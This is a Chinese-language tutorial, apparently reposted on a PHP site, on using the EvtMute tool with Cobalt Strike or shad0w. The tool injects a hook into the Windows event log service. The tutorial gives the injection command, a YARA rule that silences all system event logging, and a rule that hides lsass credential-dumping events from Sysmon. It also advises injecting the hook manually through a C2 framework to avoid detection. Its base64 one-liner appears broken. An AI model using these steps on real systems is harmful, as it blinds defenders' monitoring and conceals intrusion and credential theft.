如何使用EvtMute对Windows事件日志进行筛选过滤

雪夜
发布: 2025-09-14 08:15:05
原创
349人浏览过

本文将为您详细介绍如何利用evtmute工具windows事件日志进行筛选和过滤。evtmute允许我们使用yara规则进行攻击性操作,并对已经记录在windows事件日志中的事件进行动态过滤和筛选。

如何使用EvtMute对Windows事件日志进行筛选过滤

工具下载

研究人员可以使用以下命令将该项目克隆到本地:

git clone https://github.com/bats3c/EvtMute
登录后复制

或者,您可以直接点击底部【阅读原文】访问该项目的Releases页面,下载最新的EvtMute已编译版本。

如何使用EvtMute对Windows事件日志进行筛选过滤

工具使用

EvtMuteHook.dll包含该工具的核心功能,注入成功后,它将应用一个临时过滤器,允许报告所有事件。这个过滤器可以动态更新,而无需重新注入。SharpEvtMute.exe是一个C#程序集,可以通过在shad0w中执行或在Cobalt Strike中运行来使用。为了更好地与shad0w集成,我还计划用C语言编写原生版本。

禁用日志记录

EvtMute最常见的使用场景是禁用系统范围内的事件日志记录。我们可以应用以下Yara规则来实现:

rule disable { condition: true }
登录后复制

首先,我们需要通过向事件(event)服务中注入钩子:

.\SharpEvtMute.exe --Inject
登录后复制

如何使用EvtMute对Windows事件日志进行筛选过滤

钩子设置好后,我们可以开始添加过滤器:

.\SharpEvtMute.exe --Filter "rule disable { condition: true }"
登录后复制

如何使用EvtMute对Windows事件日志进行筛选过滤

现在,event服务将忽略所有事件。

行者AI
行者AI

行者AI绘图创作,唤醒新的灵感,创造更多可能

行者AI 100
查看详情 行者AI

复杂型过滤器

EvtMute的过滤器可以动态更改,且无需重新注入钩子,这使得研究人员可以轻松更新现有的过滤器和规则。

以下是一个更复杂的过滤器示例,它可以阻止sysmon报告与lsass内存转储相关的事件:

rule block_lsass_dump {
    meta:
        author = "@_batsec_"
        description = "Prevent lsass dumping being reported by sysmon"
    strings:
        $provider = "Microsoft-Windows-Sysmon"
        $image = "lsass.exe" nocase
        $access = "GrantedAccess"
        $type = "0x1fffff"
    condition:
        all of them
}
登录后复制

对于这种复杂的Yara规则,我们很难将其浓缩成一行代码,因此我在EvtMute中添加了Base64编码功能。

可以通过Linux命令行终端将规则转换为Base64编码:

base64 -w 0 YaraFilters/lsassdump.yar | echo $(/stdin)
登录后复制

然后,使用—Encoded选项将其传递给过滤器:

如何使用EvtMute对Windows事件日志进行筛选过滤

操作安全注意事项

在注入钩子时,SharpEvtMute.exe会调用CreateRemoteThread,这个调用是在钩子设置之前进行的,因此会被Sysmon捕捉并报告。由于SharpEvtMute.exe文件仅用于PoC,我建议大家手动将EvtMuteHook.dll注入到事件日志服务中。

可以通过运行以下命令查看事件日志服务的进程PID,您还可以通过C2框架将钩子手动注入到shellcode中。

值得注意的是,钩子将使用命名管道来更新过滤器,命名的管道名为EvtMuteHook_Rule_Pipe。

项目地址

EvtMute:点击底部【阅读原文】获取

以上就是如何使用EvtMute对Windows事件日志进行筛选过滤的详细内容,更多请关注php中文网其它相关文章!

最佳 Windows 性能的顶级免费优化软件
最佳 Windows 性能的顶级免费优化软件

每个人都需要一台速度更快、更稳定的 PC。随着时间的推移,垃圾文件、旧注册表数据和不必要的后台进程会占用资源并降低性能。幸运的是,许多工具可以让 Windows 保持平稳运行。

下载
来源:php中文网
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn
最新问题
开源免费商场系统广告
热门教程
更多>
最新下载
更多>
网站特效
网站源码
网站素材
前端模板
关于我们 免责申明 举报中心 意见反馈 讲师合作 广告合作 最新更新 English
php中文网:公益在线php培训,帮助PHP学习者快速成长!
关注服务号 技术交流群
PHP中文网订阅号
每天精选资源文章推送
PHP中文网APP
随时随地碎片化学习

Copyright 2014-2025 https://www.php.cn/ All Rights Reserved | php.cn | 湘ICP备2023035733号